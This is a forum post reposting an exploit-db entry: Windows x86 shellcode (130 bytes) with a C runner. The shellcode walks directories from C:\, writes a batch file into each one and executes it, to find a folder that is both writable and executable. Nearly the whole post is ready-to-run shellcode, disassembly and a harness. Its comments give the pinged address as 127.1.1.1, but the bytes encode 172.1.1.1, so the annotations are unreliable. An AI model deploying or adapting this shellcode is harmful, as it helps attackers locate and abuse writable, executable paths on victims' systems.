Jump to content
Massaro

Windows x86 - Executable Directory Search Shellcode (130 bytes)

Recommended Posts

# Title: Windows x86 - Executable directory search Shellcode (130 bytes)
# Date: 26-02-2017
# Author: Krzysztof Przybylski
# Platform: Win_x86
# Tested on: WinXP SP1
# Shellcode Size: 130 bytes
 
/*
Description: 
write & exec dir searcher
starts from C:\
If dir found then write, execute (ping 127.1.1.1) and exit
If Write/noexec dir found then continue
 
Tested on WinXP SP1 (77e6fd35;77e798fd)
i686-w64-mingw32-gcc shell.c -o golddgger.exe
 
Null-free version:
 
(gdb) disassemble 
Dump of assembler code for function function:
=> 0x08048062 <+0>:    pop    ecx
   0x08048063 <+1>:   xor    eax,eax
   0x08048065 <+3>:   mov    BYTE PTR [ecx+0x64],al
   0x08048068 <+6>:   push   eax
   0x08048069 <+7>:   push   ecx
   0x0804806a <+8>:   mov    eax,0x77e6fd35
   0x0804806f <+13>:  call   eax
   0x08048071 <+15>:  xor    eax,eax
   0x08048073 <+17>:  push   eax
   0x08048074 <+18>:  mov    eax,0x77e798fd
   0x08048079 <+23>:  call   eax
 
 
NULL-free shellcode (132 bytes):
 
"\xeb\x19\x59\x31\xc0\x88\x41\x64"
"\x50\x51\xb8"
"\x35\xfd\xe6\x77"                      // exec
"\xff\xd0\x31\xc0\x50\xb8"
"\xfd\x98\xe7\x77"                      // exit
"\xff\xd0\xe8\xe2\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20"
"\x2f\x43\x20\x22\x28\x63\x64\x20"
"\x63\x3a\x5c"                          // C:\
"\x20\x26\x46\x4f\x52"
"\x20\x2f\x44\x20\x2f\x72\x20\x25"
"\x41\x20\x49\x4e\x20\x28\x2a\x29"
"\x20\x44\x4f\x20"
"\x65\x63\x68\x6f\x20"
"\x70\x69\x6e\x67\x20"                  
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"  // 127.1.1.1
"\x3e\x22\x25\x41\x5c\x7a\x2e\x62"
"\x61\x74\x22\x26\x28\x63\x61\x6c"
"\x6c\x20\x22\x25\x41\x5c\x7a\x2e"
"\x62\x61\x74\x22\x26\x26\x65\x78"
"\x69\x74\x29\x29\x22";
 
*/
// NULL version (130 bytes):
 
char code[] = 
"\xeb\x16\x59\x31\xc0\x50\x51\xb8"
"\x35\xfd\xe6\x77"                  // exec
"\xff\xd0\x31\xc0\x50\xb8"
"\xfd\x98\xe7\x77"                      // exit
"\xff\xd0\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f"
"\x43\x20\x22\x28\x63\x64\x20"
"\x63\x3a\x5c"                          // C:\
"\x20\x26\x46\x4f\x52\x20\x2f\x44"
"\x20\x2f\x72\x20\x25\x41\x20\x49"
"\x4e\x20\x28\x2a\x29\x20\x44\x4f"
"\x20\x65\x63\x68\x6f\x20\x70\x69"
"\x6e\x67\x20"
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"  // 127.1.1.1 
"\x3e\x22\x25\x41"
"\x5c\x7a\x2e\x62\x61\x74\x22\x26"
"\x28\x63\x61\x6c\x6c\x20\x22\x25"
"\x41\x5c\x7a\x2e\x62\x61\x74\x22"
"\x26\x26\x65\x78\x69\x74\x29\x29"
"\x22\x00";
 
int main(int argc, char **argv)
 
{
        int (*func)();
        func = (int (*)()) code;
        (int)(*func)();
}

Sursa: https://www.exploit-db.com/exploits/41467/

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...